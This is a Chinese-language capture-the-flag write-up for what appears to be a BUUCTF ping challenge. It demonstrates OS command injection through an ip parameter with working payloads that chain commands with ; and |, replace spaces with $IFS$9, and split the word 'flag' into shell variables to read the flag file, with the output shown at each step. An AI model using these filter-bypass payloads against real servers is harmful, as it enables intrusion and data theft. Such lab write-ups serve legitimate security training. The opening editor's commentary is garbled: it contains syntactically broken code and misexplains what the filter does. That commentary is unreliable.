小编点评

**代码解析：** 代码利用正则表达式匹配目标 URL 中的 ip 地址，并通过构造参数的方式试图执行命令。 **关键代码部分：** ```bash $a = shell_exec(\"ping -c 4 \$$ip\); echo \"\"; print_r($a); ``` 1. `shell_exec()` 函数执行 `ping` 命令，并传递 `-c 4` 参数，设置ping次数为 4。 2. `$ip` 变量存储目标 ip 地址。 3. `echo \"\";` 在执行命令之前打印一个空字符串，以确保命令正确格式。 4. `print_r($a)` 打印执行命令的返回值。 **绕过安全限制：** 1. **字符编码：**代码使用 `\` 和 `\` 等字符来绕过正则表达式中的特殊字符。 2. **命令注入：**代码使用 `$ip` 变量存储用户输入的 ip 地址，并通过构造参数的方式将其注入命令中。 3. **正则表达式匹配：**正则表达式用于匹配目标 URL 中的 ip 地址，但代码通过字符编码和命令注入绕过正则匹配规则。 **注意：** 1. 这段代码仅供学习和测试目的，请勿使用它在任何实际环境中。 2. 使用此代码需要在目标服务器上运行，因为它执行了 `ping` 命令。

正文

打开靶机对应URL

提示有ip参数

尝试构造url

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1

显示

/?ip=
PING 127.0.0.1 (127.0.0.1): 56 data bytes

说明这里有命令注入的可能,构造url

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1|ls

显示

/?ip=
flag.php
index.php

老套路，尝试看一下index.php

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1|cat+index.php

显示

/?ip= fxck your space!

不可以用空格（即urlencode中的+）

知识点：
在linux中 $IFS$9 可以作为空格使用，这样可以绕过

构造url

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1;cat$IFS$9index.php

显示

/?ip=
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

?>

从这里不接受空格，同时也不接受参数中带有f l a g 这顺序的四个字母

不过这里可以利用linux创建临时变量的方式绕过

构造参数(注意这里用; 不要用|，因为这里是或的意思，会导致后面的不用执行)

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

访问后，右键查看源代码 boom

/?ip=
<pre>PING 127.0.0.1 (127.0.0.1): 56 data bytes
<?php
$flag = "flag{7d941fbe-6c50-4df6-819c-038236ae7f77}";
?>